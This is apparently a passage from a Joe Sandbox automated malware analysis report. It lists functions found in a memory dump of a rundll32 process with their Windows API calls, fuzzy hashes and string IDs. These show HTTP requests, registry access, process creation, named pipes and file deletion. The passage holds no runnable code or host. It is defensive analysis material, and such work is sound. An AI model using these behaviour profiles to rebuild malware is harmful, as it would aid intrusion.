                              • QueryPerformanceCounter.KERNEL32(?), ref: 0594F269
                              • _aulldiv.NTDLL(?,?,?,?), ref: 0594F27F
                              • wsprintfA.USER32 ref: 0594F295
                              • wsprintfA.USER32 ref: 0594F2AF
                              • wsprintfA.USER32 ref: 0594F2D4
                              • HeapFree.KERNEL32(00000000,?), ref: 0594F2E7
                              • wsprintfA.USER32 ref: 0594F30B
                              • HeapFree.KERNEL32(00000000,?), ref: 0594F31E
                              • wsprintfA.USER32 ref: 0594F358
                              • wsprintfA.USER32 ref: 0594F37C
                              • lstrcat.KERNEL32(?,?), ref: 0594F3B4
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0594F3CE
                              • GetTickCount.KERNEL32 ref: 0594F3DE
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 0594F3F2
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 0594F410
                              • StrTrimA.SHLWAPI(00000000,059553E8,00000000,05F3C310), ref: 0594F449
                              • lstrcpy.KERNEL32(00000000,?), ref: 0594F46B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0594F472
                              • lstrcat.KERNEL32(00000000,?), ref: 0594F479
                              • lstrcat.KERNEL32(00000000,?), ref: 0594F480
                              • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0594F4FA
                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 0594F50C
                              • HeapFree.KERNEL32(00000000,00000000,00000000,05F3C310), ref: 0594F51B
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594F52D
                              • HeapFree.KERNEL32(00000000,?), ref: 0594F53F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Freewsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                              • String ID:
                              • API String ID: 4198993012-0
                              • Opcode ID: 645b75a6568ed524e6e460496c5f4eb51c53f77c4879e851a33c31a9186387a5
                              • Instruction ID: 9d95229e3121a6aaea8bb5e1f21bf8a3276fa12dea2fd2396ca26c7391ba4a54
                              • Opcode Fuzzy Hash: 645b75a6568ed524e6e460496c5f4eb51c53f77c4879e851a33c31a9186387a5
                              • Instruction Fuzzy Hash: 3FA15671518306AFCB01DFA8EC8AE5ABFA9FF48314F040525FA09C6221DB35D829DF95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05947AEF Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 389memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000000,?,?), ref: 05947B51
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05947BED
                              • lstrcpyn.KERNEL32(00000000,?,?), ref: 05947C02
                              • HeapFree.KERNEL32(00000000,00000000), ref: 05947C1D
                              • StrChrA.SHLWAPI(?,00000020,00000000,?,?,?), ref: 05947D04
                              • StrChrA.SHLWAPI(00000001,00000020), ref: 05947D15
                              • lstrlen.KERNEL32(00000000), ref: 05947D29
                              • memmove.NTDLL(?,?,00000001), ref: 05947D39
                              • lstrlen.KERNEL32(?,00000000,?,?,?), ref: 05947D65
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05947D8B
                              • memcpy.NTDLL(00000000,?,?), ref: 05947D9F
                              • memcpy.NTDLL(?,?,?), ref: 05947DBF
                              • HeapFree.KERNEL32(00000000,?), ref: 05947DFB
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05947EC1
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 05947F09
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                              • String ID: GET $GET $OPTI$OPTI$POST$PUT
                              • API String ID: 3227826163-647159250
                              • Opcode ID: 08c520c51039ddf25b84143fde91fd5c0345bea85bedeadd6119821c5536dbe9
                              • Instruction ID: d0a1222c802618c61ccc7d54d82850f1829e9e0a0e7a65e42bbbf3e0214ccb03
                              • Opcode Fuzzy Hash: 08c520c51039ddf25b84143fde91fd5c0345bea85bedeadd6119821c5536dbe9
                              • Instruction Fuzzy Hash: 88E14B31A04209EFDB15CFA8C889EAABBB9FF04301F148558F9169B251DB30ED52DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593E627 Relevance: 36.3, APIs: 24, Instructions: 288memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL ref: 0593E65B
                              • wsprintfA.USER32 ref: 0593E6C5
                              • wsprintfA.USER32 ref: 0593E70B
                              • wsprintfA.USER32 ref: 0593E72C
                              • lstrcat.KERNEL32(00000000,?), ref: 0593E763
                              • wsprintfA.USER32 ref: 0593E784
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593E79E
                              • wsprintfA.USER32 ref: 0593E7C5
                              • HeapFree.KERNEL32(00000000,?), ref: 0593E7DA
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0593E7F4
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 0593E815
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 0593E82F
                                • Part of subcall function 0594EA15: lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,0593E842,00000000,05F3C310), ref: 0594EA40
                                • Part of subcall function 0594EA15: lstrlen.KERNEL32(?,?,00000000,0593E842,00000000,05F3C310), ref: 0594EA48
                                • Part of subcall function 0594EA15: strcpy.NTDLL ref: 0594EA5F
                                • Part of subcall function 0594EA15: lstrcat.KERNEL32(00000000,?), ref: 0594EA6A
                                • Part of subcall function 0594EA15: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,0593E842,00000000,05F3C310), ref: 0594EA87
                              • StrTrimA.SHLWAPI(00000000,059553E8,00000000,05F3C310), ref: 0593E864
                                • Part of subcall function 05938DC7: lstrlen.KERNEL32(05F38560,76C85520,76CC81D0,773BEEF0,0593E873,?), ref: 05938DD7
                                • Part of subcall function 05938DC7: lstrlen.KERNEL32(?), ref: 05938DDF
                                • Part of subcall function 05938DC7: lstrcpy.KERNEL32(00000000,05F38560), ref: 05938DF3
                                • Part of subcall function 05938DC7: lstrcat.KERNEL32(00000000,?), ref: 05938DFE
                              • lstrcpy.KERNEL32(?,?), ref: 0593E88D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0593E897
                              • lstrcat.KERNEL32(00000000,?), ref: 0593E8A2
                              • lstrcat.KERNEL32(00000000,?), ref: 0593E8A9
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 0593E8B4
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 0593E8D0
                                • Part of subcall function 05937DF5: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,05945583,00000000,00000000), ref: 05937E46
                                • Part of subcall function 05937DF5: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 05937ED9
                              • HeapFree.KERNEL32(00000000,?,00000001,05F3C310,?,?,?), ref: 0593E997
                              • HeapFree.KERNEL32(00000000,?,?), ref: 0593E9AF
                              • HeapFree.KERNEL32(00000000,?,00000000,05F3C310), ref: 0593E9BD
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593E9CB
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593E9D6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                              • String ID:
                              • API String ID: 4032678529-0
                              • Opcode ID: b4bda0fb78cdb9564b1a525a67fd3b0a08d9970106ab6629d807be1bc6c18aa5
                              • Instruction ID: b6bad0d4e5954d368f7c6ce1be0fea4673c8f6f8c717b95f3b462871bca5e9f0
                              • Opcode Fuzzy Hash: b4bda0fb78cdb9564b1a525a67fd3b0a08d9970106ab6629d807be1bc6c18aa5
                              • Instruction Fuzzy Hash: 7CB14671118301EFDB01DFA8DC86E2ABBE9FB88314F050928F649D7261DB35E825CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594CEB7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32 ref: 0594CED3
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0594CEEF
                              • GetLastError.KERNEL32 ref: 0594CF3E
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594CF54
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0594CF68
                              • GetLastError.KERNEL32 ref: 0594CF82
                              • GetLastError.KERNEL32 ref: 0594CFB5
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594CFD3
                              • lstrlenW.KERNEL32(00000000,?), ref: 0594CFFF
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0594D014
                              • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 0594D0E8
                              • HeapFree.KERNEL32(00000000,?), ref: 0594D0F7
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0594D10C
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594D11F
                              • HeapFree.KERNEL32(00000000,?), ref: 0594D131
                              • RtlExitUserThread.NTDLL(?,?), ref: 0594D146
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                              • String ID:
                              • API String ID: 3853681310-3916222277
                              • Opcode ID: f4524603ee3010ce5578f4d38eda2d6d30491a20f41ca228e54eb53ccea64b5f
                              • Instruction ID: 62842abf6d9cec791b430c38ef45a1e85711cfbe61f1e5fe0fe9b21db967f05a
                              • Opcode Fuzzy Hash: f4524603ee3010ce5578f4d38eda2d6d30491a20f41ca228e54eb53ccea64b5f
                              • Instruction Fuzzy Hash: 2181137191420AEFDB109FA4DD89EAEBFBDFB09201F010469F906A3250DB349D69DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05947F79 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 131memoryregistrythreadCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05947F9B
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 05947FB8
                              • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05948008
                              • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 05948012
                              • GetLastError.KERNEL32 ref: 0594801C
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594802D
                              • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0594804F
                              • HeapFree.KERNEL32(00000000,?), ref: 05948086
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0594809A
                              • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 059480A3
                              • SuspendThread.KERNEL32(?), ref: 059480B2
                              • CreateEventA.KERNEL32(0595A1E8,00000001,00000000), ref: 059480C6
                              • SetEvent.KERNEL32(00000000), ref: 059480D3
                              • CloseHandle.KERNEL32(00000000), ref: 059480DA
                              • Sleep.KERNEL32(000001F4), ref: 059480ED
                              • ResumeThread.KERNEL32(?), ref: 05948111
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                              • String ID: v
                              • API String ID: 1011176505-1801730948
                              • Opcode ID: ac753c97af96eadff163cb631c2d97b862b6dbab2e313af5edc4143f191c4356
                              • Instruction ID: bdd1a494d45a8171c49c01acc4675b25c8cf7ffd863454669e92bbe01978f2ae
                              • Opcode Fuzzy Hash: ac753c97af96eadff163cb631c2d97b862b6dbab2e313af5edc4143f191c4356
                              • Instruction Fuzzy Hash: 71416A72928209EFDB109FA0EC8ADBEBFB9FB04301B154569F606A2111DB315DA5DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05932C62 Relevance: 27.3, APIs: 18, Instructions: 275memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05951ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                                • Part of subcall function 05951ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                                • Part of subcall function 05951ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                                • Part of subcall function 05951ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 05932CA9
                              • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 05932CC7
                              • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 05932CF3
                              • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,00000000,?,00000000,?,?,?), ref: 05932D62
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05932DDA
                              • wsprintfA.USER32 ref: 05932DF6
                              • lstrlen.KERNEL32(00000000,00000000), ref: 05932E01
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05932E18
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05932EA4
                              • wsprintfA.USER32 ref: 05932EBF
                              • lstrlen.KERNEL32(00000000,00000000), ref: 05932ECA
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05932EE1
                              • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000000,?,?,?), ref: 05932F03
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05932F1E
                              • wsprintfA.USER32 ref: 05932F35
                              • lstrlen.KERNEL32(00000000,00000000), ref: 05932F40
                                • Part of subcall function 05933172: lstrlen.KERNEL32(059343C6,00000000,?,?,?,?,059343C6,00000035,00000000,?,00000000), ref: 059331A2
                                • Part of subcall function 05933172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 059331B8
                                • Part of subcall function 05933172: memcpy.NTDLL(00000010,059343C6,00000000,?,?,059343C6,00000035,00000000), ref: 059331EE
                                • Part of subcall function 05933172: memcpy.NTDLL(00000010,00000000,00000035,?,?,059343C6,00000035), ref: 05933209
                                • Part of subcall function 05933172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 05933227
                                • Part of subcall function 05933172: GetLastError.KERNEL32(?,?,059343C6,00000035), ref: 05933231
                                • Part of subcall function 05933172: HeapFree.KERNEL32(00000000,00000000,?,?,059343C6,00000035), ref: 05933254
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05932F57
                              • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,05F38A20), ref: 05932F83
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                              • String ID:
                              • API String ID: 3130754786-0
                              • Opcode ID: 77844a953cc03e74c30a9d9a3a2d565ec52dc5331f432229310988af70b91800
                              • Instruction ID: a933275d9332168cad26bcb9f8684a8a7aa6fb33919e98bfe9afd87ae4b7e7bb
                              • Opcode Fuzzy Hash: 77844a953cc03e74c30a9d9a3a2d565ec52dc5331f432229310988af70b91800
                              • Instruction Fuzzy Hash: E0A169B5914209EFDF219FA4DC8ADBEBBBEFB48305B014529F505A2210CB345D69DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05941195 Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?), ref: 059411AA
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0594BB1D
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0594BB29
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BB71
                                • Part of subcall function 0594BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BB8C
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(0000002C), ref: 0594BBC4
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?), ref: 0594BBCC
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BBEF
                                • Part of subcall function 0594BAD1: wcscpy.NTDLL ref: 0594BC01
                                • Part of subcall function 0594BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0594BC27
                                • Part of subcall function 0594BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 0594BC5D
                                • Part of subcall function 0594BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 0594BC79
                                • Part of subcall function 0594BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0594BC92
                                • Part of subcall function 0594BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0594BCA4
                                • Part of subcall function 0594BAD1: FindClose.KERNEL32(?), ref: 0594BCB9
                                • Part of subcall function 0594BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BCCD
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(0000002C), ref: 0594BCEF
                              • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 05941206
                              • memcpy.NTDLL(00000000,?,00000000), ref: 05941219
                              • lstrcpyW.KERNEL32(00000000,?), ref: 05941230
                                • Part of subcall function 0594BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0594BD65
                                • Part of subcall function 0594BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0594BD77
                                • Part of subcall function 0594BAD1: FindClose.KERNEL32(?), ref: 0594BD92
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 0594125B
                              • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 05941273
                              • HeapFree.KERNEL32(00000000,00000000), ref: 059412CD
                              • lstrlenW.KERNEL32(00000000,?), ref: 059412F0
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05941302
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 05941376
                              • HeapFree.KERNEL32(00000000,?), ref: 05941386
                                • Part of subcall function 0593AE7C: lstrlen.KERNEL32(0593E448,00000000,00000000,?,?,05947A5B,?,?,?,?,0593E448,?), ref: 0593AE8B
                                • Part of subcall function 0593AE7C: mbstowcs.NTDLL ref: 0593AEA7
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 059413AF
                              • lstrlenW.KERNEL32(0595B878,?), ref: 05941429
                              • DeleteFileW.KERNEL32(?,?), ref: 05941457
                              • HeapFree.KERNEL32(00000000,?), ref: 05941465
                              • HeapFree.KERNEL32(00000000,?), ref: 05941486
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                              • String ID:
                              • API String ID: 72361108-0
                              • Opcode ID: bebe5695c99eb014b45c7e848629e0b51d64788fe0411baff6f1e2b9d8ca9eff
                              • Instruction ID: f8a68c48b5cfac565a6c284ffcbb2bae354c3911e69c5872b0dbb836d39a0a1a
                              • Opcode Fuzzy Hash: bebe5695c99eb014b45c7e848629e0b51d64788fe0411baff6f1e2b9d8ca9eff
                              • Instruction Fuzzy Hash: 789137B151421ABFCB10DFA4DC89CAABFBDFB49351B444415F60AC7111EB34A9A8DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05935437 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • memset.NTDLL ref: 05935465
                              • StrChrA.SHLWAPI(?,0000000D), ref: 059354AB
                              • StrChrA.SHLWAPI(?,0000000A), ref: 059354B8
                              • StrChrA.SHLWAPI(?,0000007C), ref: 059354DF
                              • StrTrimA.SHLWAPI(?,05955FCC), ref: 059354F4
                              • StrChrA.SHLWAPI(?,0000003D), ref: 059354FD
                              • StrTrimA.SHLWAPI(00000001,05955FCC), ref: 05935513
                              • _strupr.NTDLL ref: 0593551A
                              • StrTrimA.SHLWAPI(?,?), ref: 05935527
                              • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 0593556F
                              • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 0593558E
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                              • String ID: $;
                              • API String ID: 4019332941-73438061
                              • Opcode ID: b68bcaa3918092efd41a7ea763ae42001270bc1710e7e1c25fcd4598d44ede16
                              • Instruction ID: 4cd250e9e74badceb70d79ca35cc96e3dab09c5b50ba4faad3b834f438020f8b
                              • Opcode Fuzzy Hash: b68bcaa3918092efd41a7ea763ae42001270bc1710e7e1c25fcd4598d44ede16
                              • Instruction Fuzzy Hash: FE41A271608306DFD711DF28C84AB1BBBEDFF89640F054819F89ADB241DB74E9058B62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05942DBB Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 136timeCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 05942DF8
                              • OpenWaitableTimerA.KERNEL32(00100000,00000000,00000000), ref: 05942E0C
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,?), ref: 05942F37
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • memset.NTDLL ref: 05942E38
                              • GetLastError.KERNEL32(?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 05942E70
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememsetwsprintf
                              • String ID: 0x%08X$W
                              • API String ID: 95801598-2600449260
                              • Opcode ID: 9cd9e74db4f1e5312e65ecd9d8bef9a40a8991214dc90edf7861472ef421692c
                              • Instruction ID: 5fd97b7a64379573b16ae8ab0392ecb7cea84c17aa77fccfcc3ad085ce13e946
                              • Opcode Fuzzy Hash: 9cd9e74db4f1e5312e65ecd9d8bef9a40a8991214dc90edf7861472ef421692c
                              • Instruction Fuzzy Hash: 565159B4504309AFDB21DF65C849FAABBE8FF08754F108519F949D6280D7B4EA54CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594C01F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0594C034
                                • Part of subcall function 0593AE7C: lstrlen.KERNEL32(0593E448,00000000,00000000,?,?,05947A5B,?,?,?,?,0593E448,?), ref: 0593AE8B
                                • Part of subcall function 0593AE7C: mbstowcs.NTDLL ref: 0593AEA7
                              • lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0594C06D
                              • wcstombs.NTDLL ref: 0594C077
                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0594C0A8
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0593A645), ref: 0594C0D4
                              • TerminateProcess.KERNEL32(?,000003E5), ref: 0594C0EA
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0593A645), ref: 0594C0FE
                              • GetLastError.KERNEL32 ref: 0594C102
                              • GetExitCodeProcess.KERNEL32(?,00000001), ref: 0594C122
                              • CloseHandle.KERNEL32(?), ref: 0594C131
                              • CloseHandle.KERNEL32(?), ref: 0594C136
                              • GetLastError.KERNEL32 ref: 0594C13A
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                              • String ID: D
                              • API String ID: 2463014471-2746444292
                              • Opcode ID: 1640d1fe5e6e1582041e3e61e7f12dd37b2a0099de9d8f25ebbd17004a0a306b
                              • Instruction ID: ca9e68e759aebcc546c32bab2e261c3432394de49a986f02ca68b51def2d1e36
                              • Opcode Fuzzy Hash: 1640d1fe5e6e1582041e3e61e7f12dd37b2a0099de9d8f25ebbd17004a0a306b
                              • Instruction Fuzzy Hash: 6D41E6B1905218BFDB11EFA4CE89DAEBBBDFB48344F214469E505B6100EB719E148F61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059344A6 Relevance: 21.4, APIs: 14, Instructions: 391memorythreadCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05934526
                              • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05934545
                              • GetLastError.KERNEL32 ref: 059346F6
                              • GetLastError.KERNEL32 ref: 05934778
                              • SwitchToThread.KERNEL32(?,?,?,?), ref: 059347C1
                              • GetLastError.KERNEL32 ref: 05934813
                              • GetLastError.KERNEL32 ref: 05934822
                              • RtlEnterCriticalSection.NTDLL(?), ref: 05934832
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 05934843
                              • RtlExitUserThread.NTDLL(?), ref: 05934851
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 059348C0
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05934911
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 05934946
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 05934956
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorHeapLast$AllocAllocateCriticalFreeSectionThreadVirtual$EnterExitLeaveSwitchUser
                              • String ID:
                              • API String ID: 2794784202-0
                              • Opcode ID: 2a5ea98ed27d6f1b28c9593091d70487967b61ed0a3227d1d13ca90f2da36c75
                              • Instruction ID: e2661e2bf1d44b95dbbd5b6cbd7b4be1e31cc6ba373cf1aa8b6e211d868eada9
                              • Opcode Fuzzy Hash: 2a5ea98ed27d6f1b28c9593091d70487967b61ed0a3227d1d13ca90f2da36c75
                              • Instruction Fuzzy Hash: 57E15CB1504249EFEF209F65CC8AEAABBBEFF08304F114529F91AD2151EB709954CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593BFF0 Relevance: 21.2, APIs: 14, Instructions: 205memorystringthreadCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0593C03F
